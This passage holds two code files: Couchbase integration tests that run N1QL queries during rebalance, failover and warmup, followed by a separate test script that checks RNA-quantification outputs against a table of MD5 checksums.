rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.servers[self.nodes_init:self.nodes_init + 1],
[],services=["kv,n1ql,index"])
rebalance.result()
try:
thread1 = threading.Thread(name='run_query', target=self.run_queries_until_timeout)
thread1.start()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init+1],
self.servers[self.nodes_init+1:self.nodes_init+2],
self.servers[self.nodes_init:self.nodes_init+1], services=["kv,index,n1ql"])
rebalance.result()
thread1.join()
self.assertFalse(self.fail, "Queries failed")
except Exception as e:
self.log.error(str(e))
###########################################################################################################
def test_prepared_with_incr_rebalance_in(self):
self.assertTrue(len(self.servers) >= self.nodes_in + 1, "Servers are not enough")
try:
for i in xrange(1, self.nodes_in + 1):
rebalance = self.cluster.async_rebalance(self.servers[:i],
self.servers[i:i + 1],[],services=['n1ql'])
rebalance.result()
self.log.info("-"*100)
self.log.info("Querying alternate query node to test the encoded_prepare ....")
self.test_prepared_between()
self.log.info("-"*100)
finally:
self.log.info("Done with encoded_prepare ....")
def test_prepared_with_incr_rebalance_out(self):
self.assertTrue(len(self.servers[:self.nodes_init]) > self.nodes_out,
"Servers are not enough")
try:
for i in xrange(1, self.nodes_out + 1):
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init - (i - 1)],
[],
self.servers[self.nodes_init - i:self.nodes_init - (i - 1)])
rebalance.result()
self.log.info("-"*100)
self.log.info("Querying alternate query node to test the encoded_prepare ....")
self.test_prepared_union()
self.log.info("-"*100)
finally:
self.log.info("Done with encoded_prepare ....")
def test_prepared_with_swap_rebalance(self):
self.assertTrue(len(self.servers) >= self.nodes_init + self.nodes_in,
"Servers are not enough")
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.servers[self.nodes_init:self.nodes_init + self.nodes_in],
self.servers[self.nodes_init - self.nodes_out:self.nodes_init])
rebalance.result()
self.log.info("-"*100)
self.log.info("Querying alternate query node to test the encoded_prepare ....")
self.test_prepared_unnest()
self.log.info("-"*100)
finally:
self.log.info("Done with encoded_prepare ....")
def test_prepared_with_rebalance_with_server_crash(self):
servr_in = self.servers[self.nodes_init:self.nodes_init + self.nodes_in]
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
self.test_case()
for i in xrange(3):
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
servr_in, servr_out)
self.sleep(5, "Wait some time for rebalance process and then kill memcached")
remote = RemoteMachineShellConnection(self.servers[self.nodes_init - 1])
remote.terminate_process(process_name='memcached')
try:
rebalance.result()
#self.log.info("-"*100)
#self.log.info("Querying alternate query node to test the encoded_prepare ....")
#self.test_prepared_unnest()
#self.log.info("-"*100)
except:
pass
self.cluster.rebalance(self.servers[:self.nodes_init], servr_in, servr_out)
self.log.info("-"*100)
self.log.info("Querying alternate query node to test the encoded_prepare ....")
self.test_prepared_within_list_object()
self.log.info("-"*100)
def test_prepared_with_failover(self):
try:
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
self.cluster.failover(self.servers[:self.nodes_init], servr_out)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], servr_out)
rebalance.result()
self.log.info("-"*100)
self.log.info("Querying alternate query node to test the encoded_prepare ....")
self.test_prepared_within_list_object()
self.log.info("-"*100)
finally:
self.log.info("Done with encoded_prepare ....")
def test_prepared_with_failover_add_back(self):
try:
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
nodes_all = RestConnection(self.master).node_statuses()
nodes = []
for failover_node in servr_out:
nodes.extend([node for node in nodes_all
if node.ip == failover_node.ip and str(node.port) == failover_node.port])
self.cluster.failover(self.servers[:self.nodes_init], servr_out)
for node in nodes:
RestConnection(self.master).add_back_node(node.id)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
rebalance.result()
self.log.info("-"*100)
self.log.info("Querying alternate query node to test the encoded_prepare ....")
self.test_prepared_within_list_object()
self.log.info("-"*100)
finally:
self.log.info("Done with encoded_prepare ....")
def test_prepared_with_autofailover(self):
autofailover_timeout = 30
status = RestConnection(self.master).update_autofailover_settings(True, autofailover_timeout)
self.assertTrue(status, 'failed to change autofailover_settings!')
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
remote = RemoteMachineShellConnection(self.servers[self.nodes_init - 1])
try:
remote.stop_server()
self.sleep(autofailover_timeout + 10, "Wait for autofailover")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], servr_out)
rebalance.result()
self.log.info("-"*100)
self.log.info("Querying alternate query node to test the encoded_prepare ....")
self.test_prepared_unnest()
self.log.info("-"*100)
finally:
remote.start_server()
self.log.info("Done with encoded_prepare ....")
def test_prepared_with_warmup(self):
try:
num_srv_warm_up = self.input.param("srv_warm_up", 1)
if self.input.tuq_client is None:
self.fail("For this test external tuq server is requiered. " +\
"Please specify one in conf")
self.test_union_all()
for server in self.servers[self.nodes_init - num_srv_warm_up:self.nodes_init]:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
remote.start_server()
remote.disconnect()
#run query, result may not be as expected, but tuq shouldn't fail
try:
self.test_union_all()
except:
pass
ClusterOperationHelper.wait_for_ns_servers_or_assert(self.servers, self, wait_if_warmup=True)
self.verify_cluster_stats(self.servers[:self.nodes_init])
self.sleep(50)
self.verify_cluster_stats(self.servers[:self.nodes_init])
self.log.info("-"*100)
self.log.info("Querying alternate query node to test the encoded_prepare ....")
self.test_prepared_union()
self.log.info("-"*100)
finally:
self.log.info("Done with encoded_prepare ....")
class QueriesOpsJoinsTests(JoinTests):
def setUp(self):
super(QueriesOpsJoinsTests, self).setUp()
if self.nodes_init > 1 and not self._testMethodName == 'suite_setUp':
self.cluster.rebalance(self.servers[:1], self.servers[1:self.nodes_init], [])
self.test_to_run = self.input.param("test_to_run", "test_join_several_keys")
def suite_setUp(self):
super(QueriesOpsJoinsTests, self).suite_setUp()
def tearDown(self):
rest = RestConnection(self.master)
if rest._rebalance_progress_status() == 'running':
self.log.warning("rebalancing is still running, test should be verified")
stopped = rest.stop_rebalance()
self.assertTrue(stopped, msg="unable to stop rebalance")
try:
super(QueriesOpsJoinsTests, self).tearDown()
except:
pass
ClusterOperationHelper.cleanup_cluster(self.servers)
self.sleep(10)
def suite_tearDown(self):
super(QueriesOpsJoinsTests, self).suite_tearDown()
def test_incr_rebalance_in(self):
self.assertTrue(len(self.servers) >= self.nodes_in + 1, "Servers are not enough")
fn = getattr(self, self.test_to_run)
fn()
for i in xrange(1, self.nodes_in + 1):
rebalance = self.cluster.async_rebalance(self.servers[:i],
self.servers[i:i + 1], [])
fn()
rebalance.result()
fn()
def test_run_queries_all_rebalance_long(self):
timeout = self.input.param("wait_timeout", 900)
self.assertTrue(len(self.servers) >= self.nodes_in + 1, "Servers are not enough")
fn = getattr(self, self.test_to_run)
fn()
rebalance = self.cluster.async_rebalance(self.servers[:1], self.servers[1:self.nodes_in + 1], [])
i = 0
end_time = time.time() + timeout
while rebalance.state != "FINISHED" and time.time() < end_time:
i += 1
self.log.info('ITERATION %s' % i)
fn()
rebalance.result()
def test_incr_rebalance_out(self):
self.assertTrue(len(self.servers[:self.nodes_init]) > self.nodes_out,
"Servers are not enough")
fn = getattr(self, self.test_to_run)
fn()
for i in xrange(1, self.nodes_out + 1):
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init - (i - 1)],
[],
self.servers[self.nodes_init - i:self.nodes_init - (i - 1)])
fn()
rebalance.result()
fn()
def test_swap_rebalance(self):
self.assertTrue(len(self.servers) >= self.nodes_init + self.nodes_in,
"Servers are not enough")
fn = getattr(self, self.test_to_run)
fn()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.servers[self.nodes_init:self.nodes_init + self.nodes_in],
self.servers[self.nodes_init - self.nodes_out:self.nodes_init])
fn()
rebalance.result()
fn()
def test_failover(self):
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
fn = getattr(self, self.test_to_run)
fn()
self.cluster.failover(self.servers[:self.nodes_init], servr_out)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], servr_out)
fn()
rebalance.result()
fn()
def test_failover_add_back(self):
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
fn = getattr(self, self.test_to_run)
fn()
nodes_all = RestConnection(self.master).node_statuses()
nodes = []
for failover_node in servr_out:
nodes.extend([node for node in nodes_all
if node.ip == failover_node.ip and str(node.port) == failover_node.port])
self.cluster.failover(self.servers[:self.nodes_init], servr_out)
for node in nodes:
RestConnection(self.master).add_back_node(node.id)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
fn()
rebalance.result()
fn()
def test_warmup(self):
num_srv_warm_up = self.input.param("srv_warm_up", self.nodes_init)
if self.input.tuq_client is None:
self.fail("For this test external tuq server is requiered. " + \
"Please specify one in conf")
fn = getattr(self, self.test_to_run)
fn()
for server in self.servers[self.nodes_init - num_srv_warm_up:self.nodes_init]:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
remote.start_server()
remote.disconnect()
#run query, result may not be as expected, but tuq shouldn't fail
try:
fn()
except:
pass
ClusterOperationHelper.wait_for_ns_servers_or_assert(self.servers, self)
fn()
|
test.py
|
import os
import sys
import subprocess
import shutil
import queue
import hashlib as hl
import threading
from threading import Thread
def md5_chksum(fname):
"""
Calculates the MD5 checksum of the file at the given path, reading it in 4 KB blocks.
"""
md5 = hl.md5()
# open file and read in blocks
with open(fname, 'rb') as f:
for chunk in iter(lambda: f.read(4096), b''):
md5.update(chunk)
return md5.hexdigest()
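# Usage sketch (editor's illustration): compare a file on disk against one of
# the reference checksums hard-coded in test_read_quant() below; the path here
# is a placeholder.
def _example_verify_checksum():
    expected = '18e19b26635e4300fd4dc7944635d1b9'  # mt1/abundance.h5 from the table below
    return md5_chksum('/path/to/mt1/abundance.h5') == expected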
def new_proj():
result = subprocess.check_output(['../../Request.sh', 'new_proj'])
result = result.decode('utf-8').strip()
results = result.split('\n')
_id = results[-2].split(':')[0]
return _id
def infer_samples(_id, md5s):
result = subprocess.check_output(['../../Request.sh', 'infer_samples', '--id', _id])
result = result.decode('utf-8').strip()
same = True
for fname, md5 in md5s.items():
if fname in result:
print('.', end='')
else:
same = False
print('\n{} not in result'.format(fname))
if md5 in result:
print('x', end='')
else:
same = False
print('\n{} not in result'.format(md5))
print()
return same
def test_read_quant(ids):
md5s = {'mt1': {'abundance.h5': '18e19b26635e4300fd4dc7944635d1b9',
'abundance.tsv': 'c454fde411b6f5d7f01b9d575417ded2',
'bs_abundance_0.tsv': 'dffec751379aee6bd0e0705b60332474',
'bs_abundance_1.tsv': '52a4fd1225214740f8c497a00f0a367c',
'bs_abundance_10.tsv': 'e218e20c73dc12585c9b9fa7c4c5f467',
'bs_abundance_11.tsv': '24e6480039a97911f76713df9bfdc768',
'bs_abundance_12.tsv': '68b79ce9389499867a66aea3e4273f91',
'bs_abundance_13.tsv': '7d5e38356d22fd805848ecfc42a23af7',
'bs_abundance_14.tsv': '265045e8fc733fb173adc5238f7f9ef0',
'bs_abundance_15.tsv': '7a6201aeca86df0b1d2aba7cad4ec131',
'bs_abundance_16.tsv': '9678fb8d5857b43b9617636a95474307',
'bs_abundance_17.tsv': '8067cf7c2b4b23db9d84c53635b9beef',
'bs_abundance_18.tsv': '6dc43423790c3cf2a13c43b220c0de32',
'bs_abundance_19.tsv': '3567ecff621feff81a2123426cbf1a90',
'bs_abundance_2.tsv': '46b67c3a2ee5dc2545864b610c2fdd27',
'bs_abundance_20.tsv': '10bff0075d2ae00da5020cea23d5d8d4',
'bs_abundance_21.tsv': '6c8228b963f10e9da2e777220c52a3d3',
'bs_abundance_22.tsv': '9cf09fb89290a1092404e12ba8b14745',
'bs_abundance_23.tsv': '9b305b91019af82adfa893c21bd94e06',
'bs_abundance_24.tsv': 'bbc3dd6a8e75066a316bef45cda9780d',
'bs_abundance_25.tsv': 'e283737890ac2ef7df4f67474f33b712',
'bs_abundance_26.tsv': 'fae8ac9a3b6bb13d6b573e80a1d343bf',
'bs_abundance_27.tsv': '9cca8becbee68b1e35fae707390a966c',
'bs_abundance_28.tsv': '54dbf44bfa20c5efa88a371356930173',
'bs_abundance_29.tsv': 'c7a886973920af4490ec4041953fe7f1',
'bs_abundance_3.tsv': 'ac1aa6c3621054e47cd536668c0b7498',
'bs_abundance_30.tsv': 'b3bf2c823d047b4e248891d672252a2a',
'bs_abundance_31.tsv': 'a0ca9e77db8fe71b395e2c0da557cbde',
'bs_abundance_32.tsv': '93a41be9bf6ee5d00329db1f59ca4c5a',
'bs_abundance_33.tsv': '15eb7c19b5920eebfce462f3e673dd4f',
'bs_abundance_34.tsv': 'f283392521500f047d532a7850de03f8',
'bs_abundance_35.tsv': '6ce337bd84785326491617a9c290bd23',
'bs_abundance_36.tsv': '42b8b86a42d158e9f3b79ef497465940',
'bs_abundance_37.tsv': 'cab46ed2f6fbbc573200cb31a77e9af6',
'bs_abundance_38.tsv': 'a0ddc6e886c9572a5903f50427bd50f9',
'bs_abundance_39.tsv': '7c5deb19853e522ef0dbb8cc969f3998',
'bs_abundance_4.tsv': 'a669b00fb0eb9d6db2aac972674ce925',
'bs_abundance_40.tsv': 'fee60461a584554e81b614a3e6b3e348',
'bs_abundance_41.tsv': 'cfce867bf6b335701b4752adb1e00f6e',
'bs_abundance_42.tsv': 'f9f6265400f2c127e7e0dcb5c9b847f1',
'bs_abundance_43.tsv': '3118383738b8ff3799750ddffd2ca613',
'bs_abundance_44.tsv': 'fda931b40fb09449901f98ce84b9505b',
'bs_abundance_45.tsv': 'c605cb9c3b85d371b3189960b2c42a5c',
'bs_abundance_46.tsv': '0eb4d1396cde3ba015587b5ef029e7c3',
'bs_abundance_47.tsv': '08e60e878eaa6f84503bf14f72dbb44e',
'bs_abundance_48.tsv': '1d2cc167e9a3d4051ee16eb814f500ec',
'bs_abundance_49.tsv': 'fbfc788e7b40626f1ef177954863a829',
'bs_abundance_5.tsv': 'b367eb760131620cec5ce885137a773a',
'bs_abundance_50.tsv': '4f84d0ba19636c0a355b8f4afcf3220b',
'bs_abundance_51.tsv': 'bf060401c7bfb6864748e04864653283',
'bs_abundance_52.tsv': '3c1a13754fd38e00122888846ae50ee9',
'bs_abundance_53.tsv': 'c041c69a271e1a79f5bb7699cd51eaea',
'bs_abundance_54.tsv': '93545da857e1fab53569cac057328081',
'bs_abundance_55.tsv': '912328e66ff92f0e59b5e0363215628d',
'bs_abundance_56.tsv': '2e597ab7006356db65e981c02cfd62bb',
'bs_abundance_57.tsv': 'd353dbb6b512fdef16f1786e45cd7d30',
'bs_abundance_58.tsv': '82d6074bfc03c6b9578c26856305294d',
'bs_abundance_59.tsv': '849d77ebf5382ded9fec484b58732e8c',
'bs_abundance_6.tsv': '6eb26f83f7ab3d0ffb3932f8035c9431',
'bs_abundance_60.tsv': '0327a8e8fb871f1503f785111f37aaa9',
'bs_abundance_61.tsv': '22983c3b28d75cd331f30e02ead02456',
'bs_abundance_62.tsv': '8a806eb6853e85b9afe1fb18dba8947f',
'bs_abundance_63.tsv': 'd10de99d0d09186f2bf82aae5f388b26',
'bs_abundance_64.tsv': '47c22505ff0dec9628c8756986489af2',
'bs_abundance_65.tsv': 'e221e155494318bbd924af3c4e486486',
'bs_abundance_66.tsv': 'fe760b969f824b99f3796d06c2e2c05f',
'bs_abundance_67.tsv': 'ac40e0272c88a28da0cc8d9d18961019',
'bs_abundance_68.tsv': '49cbe5255561e0ec597614da2bf6d4bb',
'bs_abundance_69.tsv': '9efa652cc0a6ccda484f4696ea189c03',
'bs_abundance_7.tsv': 'adb7d24523860beb5662cad2f55ecb4a',
'bs_abundance_70.tsv': 'ee8a3b0aae56de8aa499f1a12eaeb935',
'bs_abundance_71.tsv': 'aa154ad0e59e3d183572026732dfb0e4',
'bs_abundance_72.tsv': '5e004e1a062beea326dd02a115f818c8',
'bs_abundance_73.tsv': 'e47a1b7966396cdafd5815f916eb6981',
'bs_abundance_74.tsv': 'e7ccebf343c82a07737c45fdbaf6de5d',
'bs_abundance_75.tsv': 'fc5f5076d1fd5a742a65415fa08ccfb1',
'bs_abundance_76.tsv': 'a55099126b57bd05fc671ac190bb4b11',
'bs_abundance_77.tsv': '74d690d7ae39c0a919188b455a727d71',
'bs_abundance_78.tsv': '83c4678e384dd2ac106dfb7e5f1aa021',
'bs_abundance_79.tsv': 'cd50bc4f38bdc73039f4a073558f910a',
'bs_abundance_8.tsv': '1468f2109ba72e96ad400f979d83d1c0',
'bs_abundance_80.tsv': '757ba29303b0805a2d5b0117f5f8c869',
'bs_abundance_81.tsv': '06ecad36bf1a2fa90c05ea8535407abd',
'bs_abundance_82.tsv': 'ac5c0fadd4f21fe02d35ba9d16a2f061',
'bs_abundance_83.tsv': '8706afc7ca2527aba4aed0aaca3c683e',
'bs_abundance_84.tsv': 'fd0041b783324eea4d81db9cf2a1bc52',
'bs_abundance_85.tsv': '094c9c704a1d2a01e1dff2812397a527',
'bs_abundance_86.tsv': '49656f9d19a0eed3dceefd94d6cbf2ea',
'bs_abundance_87.tsv': '9a2afa652436c6b045cd8a44347ee03d',
'bs_abundance_88.tsv': '0b48593f6ca526bf016cd48115b350fe',
'bs_abundance_89.tsv': '45f46126ff05ef6881233cf8df50aa61',
'bs_abundance_9.tsv': '3e4842db5b118def2d58e3d8e1487528',
'bs_abundance_90.tsv': '3b4cac3410a0b778a49d5819afed21ac',
'bs_abundance_91.tsv': '6a477667e807afc687d7f0d4cd5d45eb',
'bs_abundance_92.tsv': 'e72a2c91aab749253b74d34565e5b084',
'bs_abundance_93.tsv': '1c3f06d564209cfcaadd3547d44f1e01',
'bs_abundance_94.tsv': '3a1e15043250cc18981610412547cfa0',
'bs_abundance_95.tsv': 'd864f0b812ab6db4c46617811af5de25',
'bs_abundance_96.tsv': '77ef9e5a5a1f36de7037dd4a9e302b58',
'bs_abundance_97.tsv': 'cc1edb9797ba244a8ffc02fc2382cf99',
'bs_abundance_98.tsv': 'd4d49e8364afada3e4910377072f1e7b',
'bs_abundance_99.tsv': '814c164823838b7c93a2022546d4943d',
'run_info.json': '802f5708307f580819e888b28b4aed5b'},
'mt2': {'abundance.h5': '09226f235687d9e38db360f115e2abbf',
'abundance.tsv': 'd4ed767adb992e41ab477ba68c948e19',
'bs_abundance_0.tsv': '053ef3164ce283cf447942f3497dfab1',
'bs_abundance_1.tsv': '5879aa7a04cd355599ea4168343240fc',
'bs_abundance_10.tsv': 'e0f360d23733ef4f70292c3e03a466ec',
'bs_abundance_11.tsv': 'ad037a33ac185046ea8d6214776f3b3f',
'bs_abundance_12.tsv': '02d9e1a89493d99b06c95136ba178e24',
'bs_abundance_13.tsv': '34f149f93812faab0c28043ad1df7041',
'bs_abundance_14.tsv': 'f9e27a842834510a8f836899e9c46b6f',
'bs_abundance_15.tsv': '068f056dfcff7fb99010bc4f9c25706d',
'bs_abundance_16.tsv': 'e5a3609e8cef51bd638eda76443ef172',
'bs_abundance_17.tsv': '4c2c95c7c0da2bf6c01ba4c3006a66e0',
'bs_abundance_18.tsv': '4a20b472aa619cda59dbb45f620c7d0e',
'bs_abundance_19.tsv': '093f42713d5deffc3e7c1e222796b36a',
'bs_abundance_2.tsv': 'b5414983d33909aa08f052050c89f217',
'bs_abundance_20.tsv': 'ec538481a95018f85e7cd5f4d285f66e',
'bs_abundance_21.tsv': '5f376260406248cde7be07d8aad7304f',
'bs_abundance_22.tsv': '8982d120f1330a61e13e0940df3645c9',
'bs_abundance_23.tsv': '1a5bcb501b9436f68f84f3890674a62c',
'bs_abundance_24.tsv': '8461adc81566244ec4bdbcfc71036d31',
'bs_abundance_25.tsv': '1033ad357389741d103187c6e893dcc1',
'bs_abundance_26.tsv': '8099b55197230eb10ba939e53f1cdae2',
'bs_abundance_27.tsv': 'be9da0d85f1636ab94fc7a8350909b9e',
'bs_abundance_28.tsv': 'a4e20780ffd2f97fc8e2a474cfa11bb1',
'bs_abundance_29.tsv': '31da7d5e1cb8f6aa837c4a23dfca045b',
'bs_abundance_3.tsv': '03a03e1a1ce7df5e9a080bec1ad87200',
'bs_abundance_30.tsv': '70aebbac112e38bcc69e2349fa5d9841',
'bs_abundance_31.tsv': '8158e46d809587654972345eed9aeefe',
'bs_abundance_32.tsv': 'd6955aeb64c11698291bf43538231791',
'bs_abundance_33.tsv': '477d557e424e00fae6222ef5fab2b730',
'bs_abundance_34.tsv': 'e6395c3829765a762e332b59dc2cfb08',
'bs_abundance_35.tsv': '00d29b6de9d33b7593de039a86ec10dd',
'bs_abundance_36.tsv': '68d880dde9584438cd0a7705d34f0c52',
'bs_abundance_37.tsv': '809e687dd144bb9324b6ceef1399e04c',
'bs_abundance_38.tsv': '4300dd6d0733726b6d4f2ebaae572d64',
'bs_abundance_39.tsv': 'bb10f9e392905842df0abadd53b27fd7',
'bs_abundance_4.tsv': '78710d139db1df92543ca9c5535de15c',
'bs_abundance_40.tsv': 'ac199e19dbf8b80d9c0f177742024769',
'bs_abundance_41.tsv': '18f064e7de58eca6801578a155f71fac',
'bs_abundance_42.tsv': '2c857fc3386996989b823df8422b7c7d',
'bs_abundance_43.tsv': '664cdfa73eaa69b57880d952ff8f827d',
'bs_abundance_44.tsv': 'd103abc9f145afe69c8d3382ac6d35db',
'bs_abundance_45.tsv': 'b45506bee4f9f564a651946bc9761e38',
'bs_abundance_46.tsv': 'e13969000eaccf0364ddf663350b68f7',
'bs_abundance_47.tsv': 'c93468cf5fab98edb880eba759125119',
'bs_abundance_48.tsv': '9cf40f680825246069a1f24c775ccc83',
'bs_abundance_49.tsv': '91cbe755af7cada7abefa2c2615c715b',
'bs_abundance_5.tsv': '506e02e4ad23a3ae0be63fea6097e0db',
'bs_abundance_50.tsv': 'fd168b48f41133dc0d89ba1952bc4368',
'bs_abundance_51.tsv': 'bc1ceb05c4caa4dd82a41839c747c871',
'bs_abundance_52.tsv': '3f36280f002a42ed45fee588457542c9',
'bs_abundance_53.tsv': '929bc94d1d95e03c0f26ab3719d9a332',
'bs_abundance_54.tsv': '7d469926f4d6e7695078590b103c2a27',
'bs_abundance_55.tsv': 'a3065808f108ea4f5f3d899f26841e40',
'bs_abundance_56.tsv': '3ad1f26e66a6425e5462fdbeb8bc6dd2',
'bs_abundance_57.tsv': '2cfd8fd8ce0c18340972059ae8c0c306',
'bs_abundance_58.tsv': 'b3ec89f0d2da80ee7135917de3274ae2',
'bs_abundance_59.tsv': 'f4e85d70a8ac675ce1a5ff3f69ecf7a3',
'bs_abundance_6.tsv': 'f8ca6432829694111f41728746d630f4',
'bs_abundance_60.tsv': '2e51034f409587e7eca92013e6f718df',
'bs_abundance_61.tsv': '772e8d7b58a9ade800c9d866c8184223',
'bs_abundance_62.tsv': 'e3e88d0e09f8c210b13e0694fefc72e1',
'bs_abundance_63.tsv': 'c40c5a83e4e46adb3087dc00ae8eb545',
'bs_abundance_64.tsv': '7d905b7961347883813cd2b4626a74ca',
'bs_abundance_65.tsv': 'b42b46cf8430c0b44e24ed2088c72c4d',
'bs_abundance_66.tsv': '8e7137b27ada3345535a69d271ca4c49',
'bs_abundance_67.tsv': 'c3f08113c043beed5bd60d9316151615',
'bs_abundance_68.tsv': '2222f22fd9981ca3aee4a960526b3080',
'bs_abundance_69.tsv': '5a1a6852c689fc7a061745008958c45e',
'bs_abundance_7.tsv': '2ae77ce9de2027c0f77ebd02f525609b',
'bs_abundance_70.tsv': '42606eb9e36a9a18bb58038fea2c9e22',
'bs_abundance_71.tsv': '9a83c39e0e7c1576a15d601b798d9058',
'bs_abundance_72.tsv': '958503b55644e3ce327cc4257ea5ca07',
'bs_abundance_73.tsv': '5b449fa979f13e5394861c8ecb7ede6f',
'bs_abundance_74.tsv': '843864a6366400e2a89162239d48435e',
'bs_abundance_75.tsv': 'cd90d5a0fcba0a4d0e892ad38fa9d4dd',
'bs_abundance_76.tsv': 'db250387f2a6993fc4b5c85b4aaba9f2',
'bs_abundance_77.tsv': '89f8a5b95562f0f023da327a866ea4ac',
'bs_abundance_78.tsv': '4624d855e0ea3d735bad767678036594',
'bs_abundance_79.tsv': 'c1050dac160b4dc26b22558f15a793b7',
'bs_abundance_8.tsv': '8ec7229611b912dd964a52b8cce1fbeb',
'bs_abundance_80.tsv': 'fe4b693d6d6e97585cc3d04af21ade3a',
'bs_abundance_81.tsv': '3b29cf7e8a51f28a4e4ef436a7c5fd74',
'bs_abundance_82.tsv': '8a99c60e21715dd11e6c294e5960822f',
'bs_abundance_83.tsv': 'cad5bcbf4e083d67f7c051a12678b406',
'bs_abundance_84.tsv': 'e007a8d635be31072820d31d4ef2af2b',
'bs_abundance_85.tsv': 'da3fe8486044d19cc8ee7770f2c005c0',
'bs_abundance_86.tsv': '3fe14d22464a4b691fae5407af18f997',
'bs_abundance_87.tsv': 'a3060430b5a17b20f0f906ea19a52c20',
'bs_abundance_88.tsv': 'e5028b212ebcbd8042ec02901e31378e',
'bs_abundance_89.tsv': '22dd83a40223e7636b30d929007f78d0',
'bs_abundance_9.tsv': '686da5c49b0d9957271a5ebecc64aeb1',
'bs_abundance_90.tsv': '80d111aad29a73301233ab4ca8c5d973',
'bs_abundance_91.tsv': '55eb92c2d3f72980bacbd48556ddbcad',
'bs_abundance_92.tsv': 'be98d8ceac768d250ed49c8576d7ac51',
'bs_abundance_93.tsv': '027e08f0476ee690215f350958f6836f',
'bs_abundance_94.tsv': '640455d0747767e6b70905952d4f40b3',
'bs_abundance_95.tsv': '79dd3f214fc8fd08adaf23961dc5d8f6',
'bs_abundance_96.tsv': '482814b4940dcd3ee2f03feddd896a08',
'bs_abundance_97.tsv': 'f432acf7ad7c20be481ec308b7892791',
'bs_abundance_98.tsv': 'e44d4ad64d333eff44a055b54939f4c9',
'bs_abundance_99.tsv': 'de385260f7a188acd56a1f553f62aa44',
'run_info.json': 'adfdcfd7130b3a9ce38d23b76136922f'},
'wt1': {'abundance.h5': '67374ad88215387b8e400d906c33a11d',
'abundance.tsv': 'a920335482da4f89ae2865d46288cf83',
'bs_abundance_0.tsv': '96fc5d32d69c292527d0897cc2f57ae8',
'bs_abundance_1.tsv': 'e31212f1ed6ae7efc10cc7d6e8e07d13',
'bs_abundance_10.tsv': '4b7177330a73f06006bc574e0600a525',
'bs_abundance_11.tsv': '4e3c32c7922a3872fafc9f29c3972021',
'bs_abundance_12.tsv': '23e63f09f3c215e9219b6842eb447ecd',
'bs_abundance_13.tsv': '860da002d353c5687dbddfb123deb225',
'bs_abundance_14.tsv': '58df6c57907fee1c0cb941c8a1a92433',
'bs_abundance_15.tsv': '4857568dfb7d1e3f3ed0c17fcbbe25c4',
'bs_abundance_16.tsv': '7b3c4595eaea03c8ae78ea1b97a4ec86',
'bs_abundance_17.tsv': 'd66694de5eb375bcdf1589fd5d6bf420',
'bs_abundance_18.tsv': '166789d723715d90f2a5dea0a7d8fdd0',
'bs_abundance_19.tsv': 'd7598fb27d0e4dafdc389c03e778ce8e',
'bs_abundance_2.tsv': '88bb15c2e1a0a9edd5ef1dc253d553db',
'bs_abundance_20.tsv': '19af541ae9c6bdfa1c5f8a064a4dc3b7',
'bs_abundance_21.tsv': 'aa951d6eb7753a5d74bdd6c69da78278',
'bs_abundance_22.tsv': '3b26a637f60112a0a98241b4a9cfd0de',
'bs_abundance_23.tsv': 'e4dcc0ecf9bdb8a99a2db59d2b4ba5b8',
'bs_abundance_24.tsv': '47513e39938673fbd20a0a13acd33510',
'bs_abundance_25.tsv': 'e89c6465f65c40d20f1b2b5de1a7581d',
'bs_abundance_26.tsv': '83a58c15826961ec251b742e35380bdf',
'bs_abundance_27.tsv': 'a7e87373c0a6a8f9d345493d73940802',
'bs_abundance_28.tsv': '9da4a17054065a0c42b0ee56c368d800',
'bs_abundance_29.tsv': 'faed0e037caec85e2b01893dfe657d97',
'bs_abundance_3.tsv': '72181c51ad10456ccd580ee29323eea5',
'bs_abundance_30.tsv': 'e0c5a4f96af92d1b71a75e63d6e581ea',
'bs_abundance_31.tsv': '4cd8f1a3d390a8f1ccb6b6402d907fe5',
'bs_abundance_32.tsv': '3977d9f86f92551a60ce9c9fe3a14af5',
'bs_abundance_33.tsv': '18ab770b77d3051a4ae492d80e37534b',
'bs_abundance_34.tsv': '67835db906b74d9f48204b1cfd9a4a03',
'bs_abundance_35.tsv': '73c86ff7494b06154e3ad3e22fb6a4e1',
'bs_abundance_36.tsv': '0b5b1ef90ad518907fc633a78b0de55d',
'bs_abundance_37.tsv': 'fcf28eeecdb12e126fe29c949d28061f',
'bs_abundance_38.tsv': 'a6ecd516c776b8758cdd9919fd8f0490',
'bs_abundance_39.tsv': '9481dc802ae167422444eb4a07a61b12',
'bs_abundance_4.tsv': '9dd2946ebf6b6d8535b544a746ba4e55',
'bs_abundance_40.tsv': '13cc784de3d78953381f6915fbc94210',
'bs_abundance_41.tsv': '8e70e46e1c0d92073b9dbaf1d1703800',
'bs_abundance_42.tsv': '0202cfc68e20785afe9e36e09f621d39',
'bs_abundance_43.tsv': '5faab1cd70583b0fd57314ce0863e3d0',
'bs_abundance_44.tsv': '6624c3b4409c48963454d6232b71f655',
'bs_abundance_45.tsv': '92b7fa4ee8081b46ec625341e68b1a3b',
'bs_abundance_46.tsv': '99aa2272c8248f75ef0b3258835fc651',
'bs_abundance_47.tsv': '255f563c31e56e821e5cfc0b655e57f0',
'bs_abundance_48.tsv': '3fc863b291a362c36fefff5ce39f3894',
'bs_abundance_49.tsv': '564df28a3a7611bde16c07762b25cc00',
'bs_abundance_5.tsv': '469c1a4d6e39a1c3f4a424029cb16118',
'bs_abundance_50.tsv': 'd70b23ee8203128ee4c6e478444e74ef',
'bs_abundance_51.tsv': '247869513215384686e3350148d1d631',
